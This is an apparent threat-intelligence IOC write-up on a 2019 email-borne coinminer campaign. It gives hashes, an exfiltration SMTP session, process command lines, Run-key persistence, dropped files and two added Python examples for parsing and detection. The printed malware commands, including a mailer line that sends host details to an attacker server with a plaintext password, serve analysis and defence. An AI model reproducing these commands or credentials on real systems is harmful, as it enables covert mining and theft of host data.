VRad

#coinminer_250219

Feb 25th, 2019
#IOC #OptiData #VR #coinminer #bmcon #SCR

https://pastebin.com/ELpZTc1y

attack_vector
--------------
email attach > SCR > C:\Intel\*

email_headers
--------------
Received: from [10.10.18.73] (helo=frv73.fwdcdn.com) by frv53.fwdcdn.com;
Received: from mx-out-10.default-host.net ([185.104.44.45]) by frv73.fwdcdn.com
Received: from [10.109.98.35] (unknown [46.148.20.31]) by mx-out-10.default-host.net
From: Вiкторiя Коваль <mail@pilontravel.com>
To: <user0@victim.com>
Subject: Добрий день
Date: Mon, 25 Feb 2019 07:27:41 +0200

files
--------------
SHA-256 5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c
File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, v69]
File size 735.93 KB

SHA-256 de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65
File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 793.76 KB

SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
File name bmcon.exe
File size 354.5 KB

SHA-256 f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04
File name private.exe
File size 292.87 KB

SHA-256 1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
File name sender.exe
File size 220 KB

SHA-256 1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46
File name bmstart.exe
File size 349.5 KB

SHA-256 25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8
File name bm-xmrig.exe
File size 467.5 KB

activity
**************

SEND SMTP_587
--------------
220 vserver321.axc.nl ESMTP Exim 4.91 Mon, 25 Feb 2019 12:16:42 +0100
EHLO victim
250-vserver321.axc.nl Hello victim [victim-Public-IP]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
235 Authentication succeeded
MAIL FROM:<sender@download-files.site> BODY=8BITMIME
250 OK
RCPT TO:<recipient@8680541.store>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Date: Mon, 25 Feb 2019 13:16:12 +0200
From: Robot Ukr<sender@download-files.site>
To: recipient@8680541.store
X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01d4ccfb$Blat.v3.0.7$841b4e9f$6e43fb7980@download-files.site>
Subject: victim-PC/User-admin
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
 charset="UTF-8"

OS-Windows7 x64/CPU
PU-...................... VGA ...................... ..............
.
250 OK id=1gyEFX-00CvKe-IH
QUIT
221 vserver321.axc.nl closing connection

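The SMTP session above, replayed through a small parser as an added example (this is not part of the paste or the analyst's tooling). It separates client commands from server replies, decodes the SASL PLAIN initial response (base64 of authzid NUL username NUL password, RFC 4616), and records the points a responder would note: the client authenticated in clear text on 587 even though the server advertised STARTTLS, the X-Mailer is Blat, and the message body is a host fingerprint rather than mail. TRANSCRIPT is a trimmed copy of the session above; the function and field names are this example's own.

```python
"""Parse and triage a captured outbound SMTP session (added example).
TRANSCRIPT is a trimmed copy of the session shown in the paste."""
import base64
import re

TRANSCRIPT = """\
220 vserver321.axc.nl ESMTP Exim 4.91 Mon, 25 Feb 2019 12:16:42 +0100
EHLO victim
250-vserver321.axc.nl Hello victim [victim-Public-IP]
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
235 Authentication succeeded
MAIL FROM:<sender@download-files.site> BODY=8BITMIME
250 OK
RCPT TO:<recipient@8680541.store>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
From: Robot Ukr<sender@download-files.site>
To: recipient@8680541.store
X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
Subject: victim-PC/User-admin
MIME-Version: 1.0

OS-Windows7 x64/CPU
.
250 OK id=1gyEFX-00CvKe-IH
QUIT
221 vserver321.axc.nl closing connection
"""

REPLY_RE = re.compile(r"^\d{3}[ -]")   # server replies carry a 3-digit code
ADDR_RE = re.compile(r"<([^>]*)>")      # address inside MAIL FROM / RCPT TO


def decode_sasl_plain(blob: str) -> dict:
    """SASL PLAIN initial response: base64(authzid NUL username NUL password)."""
    parts = base64.b64decode(blob).split(b"\x00")
    if len(parts) != 3:
        raise ValueError("not a PLAIN initial response")
    authzid, username, password = (p.decode("utf-8", "replace") for p in parts)
    return {"authzid": authzid, "username": username, "password": password}


def parse_smtp_transcript(text: str) -> dict:
    """Walk the transcript once; keep client commands and the DATA payload."""
    s = {"starttls": False, "auth": None, "mail_from": None,
         "rcpt_to": [], "headers": {}, "body": []}
    in_data = in_headers = expect_354 = False
    for line in text.splitlines():
        if in_data:
            if expect_354 and line.startswith("354"):
                expect_354 = False           # server go-ahead, not payload
            elif line == ".":
                in_data = False              # end-of-data marker
            elif in_headers and line == "":
                in_headers = False           # blank line closes the header block
            elif in_headers:
                name, _, value = line.partition(":")
                s["headers"][name.strip()] = value.strip()
            else:
                s["body"].append(line)
            continue
        if REPLY_RE.match(line):
            continue                         # server side, nothing to extract
        verb, _, rest = line.partition(" ")
        verb = verb.upper()
        if verb == "STARTTLS":
            s["starttls"] = True
        elif verb == "AUTH":
            mech, _, blob = rest.partition(" ")
            s["auth"] = {"mechanism": mech.upper()}
            if mech.upper() == "PLAIN" and blob:
                s["auth"].update(decode_sasl_plain(blob))
        elif verb == "MAIL":
            s["mail_from"] = ADDR_RE.search(rest).group(1)
        elif verb == "RCPT":
            s["rcpt_to"].append(ADDR_RE.search(rest).group(1))
        elif verb == "DATA":
            in_data = in_headers = expect_354 = True
    return s


def triage(s: dict) -> list:
    """Findings a responder would record for the parsed session."""
    out = []
    auth = s["auth"] or {}
    if auth.get("mechanism") == "PLAIN" and not s["starttls"]:
        out.append("AUTH PLAIN in clear text (no STARTTLS before it); "
                   f"username {auth.get('username')}")
    mailer = s["headers"].get("X-Mailer", "")
    if mailer.lower().startswith("blat"):
        out.append("command-line mailer: " + mailer)
    if any(b.startswith("OS-") for b in s["body"]):
        out.append("body is a host fingerprint (OS/CPU/VGA): a check-in, not mail")
    return out
```

Run `triage(parse_smtp_transcript(TRANSCRIPT))` to get the three findings; the decoded username matches the `-u` argument seen later in the sender.exe command line, which ties the SMTP session to that process without needing the pcap and the process list side by side.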
netwrk
--------------
http.request.method == GET
91.223.19.233 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJB... HTTP/1.1 Microsoft-CryptoAPI/6.1
91.223.19.242 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJB... HTTP/1.1 Microsoft-CryptoAPI/6.1
205.185.216.42 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?ef2a83e4926beeac HTTP/1.1 Microsoft-CryptoAPI/6.1

ssl
88.99.38.225 dl.browsermine.com Client Hello

comp
--------------
bmcon.exe 3048 TCP localhost 49231 88.99.38.225 443 ESTABLISHED
bmcon.exe 3048 TCP localhost 49232 91.223.19.233 80 ESTABLISHED
bmcon.exe 3048 TCP localhost 49233 91.223.19.242 80 ESTABLISHED

bm-xmrig.exe 3000 TCP localhost 49236 159.69.189.115 4444 ESTABLISHED
svchost.exe 244 TCP localhost 49237 205.185.216.42 80 ESTABLISHED

proc
--------------
"C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe /c ""C:\Intel\enable.cmd" "

C:\Windows\SysWOW64\reg.exe reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f

C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0

C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe -h off

C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel

C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel\bmcon

C:\Windows\SysWOW64\cmd.exe /c ver

C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .

C:\Windows\SysWOW64\Wbem\WMIC.exe CPU Get Name /Value

C:\Windows\SysWOW64\cmd.exe /c /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="

C:\Windows\SysWOW64\Wbem\WMIC.exe /Node:localhost Path Win32_VideoController Get Name /Value

C:\Intel\sender.exe -to recipient@8680541.store -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU..."

C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f

C:\Windows\SysWOW64\PING.EXE -n 300 127.0.0.1

C:\Intel\bmcon.exe

"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"

C:\Intel\bmcon\bm-xmrig.exe

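A detection pass over the process list above, as an added example that is not part of the paste: a small rule set run over process-creation command lines (the field Sysmon event 1 or Windows 4688 records) that names which step of this chain each line belongs to. The rules are written generically rather than for these exact paths (any system+hidden directory under a drive root, any HKCU/HKLM Run key add or delete, any powercfg call that disables sleep or hibernation, any Blat-style mailer invocation with credentials on the command line), so they also cover later variants with different folder names. SAMPLE is a constructed copy of the proc section with the SMTP password replaced by a placeholder; the rule names are this example's own, not a vendor taxonomy.

```python
"""Rule-based triage of process command lines from a coinminer infection
(added example). SAMPLE is a constructed copy of the proc section above,
password replaced by a placeholder."""
import re

SAMPLE = r"""
"C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe /c ""C:\Intel\enable.cmd" "
C:\Windows\SysWOW64\reg.exe reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -h off
C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel
C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel\bmcon
C:\Windows\SysWOW64\Wbem\WMIC.exe CPU Get Name /Value
C:\Windows\SysWOW64\Wbem\WMIC.exe /Node:localhost Path Win32_VideoController Get Name /Value
C:\Intel\sender.exe -to recipient@8680541.store -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw [redacted] -subject "PC-APM11/User-support"
C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
C:\Windows\SysWOW64\PING.EXE -n 300 127.0.0.1
"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
C:\Intel\bmcon\bm-xmrig.exe
"""

# (rule name, pattern, why it matters); names are this example's own
RULES = [
    ("screensaver_dropper", re.compile(r'\.scr"?\s+/S\b', re.I),
     "a .scr (screensaver PE) executed from a user profile"),
    ("decoy_document", re.compile(r'WINWORD\.EXE"?\s.*/dde', re.I),
     "Word opened right after the dropper: decoy document for the victim"),
    ("run_key_persistence",
     re.compile(r'reg(\.exe)?\s+add\s+"?HK\w+\\.*\\CurrentVersion\\Run\b', re.I),
     "Run-key autostart value added"),
    ("run_key_cleanup",
     re.compile(r'reg(\.exe)?\s+(reg\s+)?delete\s+"?HK\w+\\.*\\CurrentVersion\\Run\b', re.I),
     "older Run-key value removed (upgrade of a previous install)"),
    ("sleep_disabled",
     re.compile(r'powercfg(\.exe)?\s+(-h\s+off|-change\s+-(standby|hibernate)-timeout-ac\s+0'
                r'|-setacvalueindex\s+SCHEME_CURRENT)', re.I),
     "power management disabled so the host keeps mining"),
    ("hidden_system_dir", re.compile(r'attrib(\.exe)?\s+\+s\s+\+h\s+[A-Z]:\\', re.I),
     "directory marked system+hidden"),
    ("hardware_profiling",
     re.compile(r'WMIC(\.exe)?\s.*(CPU\s+Get\s+Name|Win32_VideoController)', re.I),
     "CPU/GPU enumeration to choose a miner build"),
    ("cmdline_mailer",
     re.compile(r'\s-server\s+\S+\s+-port\s+\d+\s+-u\s+\S+\s+-pw\s+', re.I),
     "Blat-style mailer with SMTP credentials on the command line"),
    ("ping_sleep", re.compile(r'PING(\.EXE)?\s+-n\s+\d{2,}\s+127\.0\.0\.1', re.I),
     "ping to loopback used as a delay timer"),
    ("known_miner_binary", re.compile(r'xmrig', re.I),
     "XMRig-named binary"),
]


def scan(log: str) -> list:
    """Return one finding per (rule, command line) pair that matches."""
    findings = []
    for cmd in (l.strip() for l in log.splitlines() if l.strip()):
        for name, pattern, why in RULES:
            if pattern.search(cmd):
                findings.append({"rule": name, "why": why, "cmdline": cmd})
    return findings


def summarize(findings: list) -> dict:
    """Hits per rule. Several distinct rules firing on one host within a few
    minutes is the signal; any single rule is weak evidence on its own."""
    counts = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE)
    for f in hits:
        print(f"[{f['rule']}] {f['why']}\n    {f['cmdline']}")
    print(summarize(hits))
```

On the sample every rule fires at least once, and the four powercfg invocations alone are a strong lead: ordinary software has no reason to turn off standby, hibernation and the hibernate file in one burst. When wiring this into a SIEM, key the correlation on the parent process or the originating directory (here everything lives under C:\Intel) rather than on the binary names, which the operator can rename at will.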
persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.02.2019 13:16

#1 BMCon
c:\intel\bmcon.exe 03.11.2018 2:42

#2 private
17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
c:\intel\private.exe 20.06.1992 0:22

drop
--------------
C:\Intel\bmcon.exe
C:\Intel\bmcon.json
C:\Intel\GfxUI.exe.config
C:\Intel\IGFXDEVLib.dll
C:\Intel\iglhxa32.vp
C:\Intel\Impcd.cat
C:\Intel\IntcDAuC.dll
C:\Intel\mup.xml
C:\Intel\private.exe
C:\Intel\readme-VGA.txt
C:\Intel\sender.exe
C:\Intel\Setup2.if2
C:\Intel\bmcon\apps.json
C:\Intel\bmcon\bmstart.exe
C:\Intel\bmcon\bm-xmrig.exe
C:\Intel\bmcon\bm-xmrig.json
C:\Intel\bmcon\bm-xmrig-amd.exe
C:\Intel\bmcon\bm-xmrig-amd.json
C:\Intel\bmcon\bm-xmrig-nvidia.exe
C:\Intel\bmcon\bm-xmrig-nvidia.json
C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
C:\Intel\bmcon\bm-xmrig-x32.exe

# # #
https://www.virustotal.com/#/file/5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c/details
https://www.virustotal.com/#/file/de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65/details
https://analyze.intezer.com/#/analyses/b8d83fe5-1420-48e5-a64d-a7fa8b858cf8
https://www.virustotal.com/#/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
https://www.virustotal.com/#/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
https://www.virustotal.com/#/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
https://www.virustotal.com/#/file/1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46/details
https://www.virustotal.com/#/file/25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8/details
https://analyze.intezer.com/#/analyses/8b737361-aa0c-42b0-99ce-fe8ae2fe8742

VR

@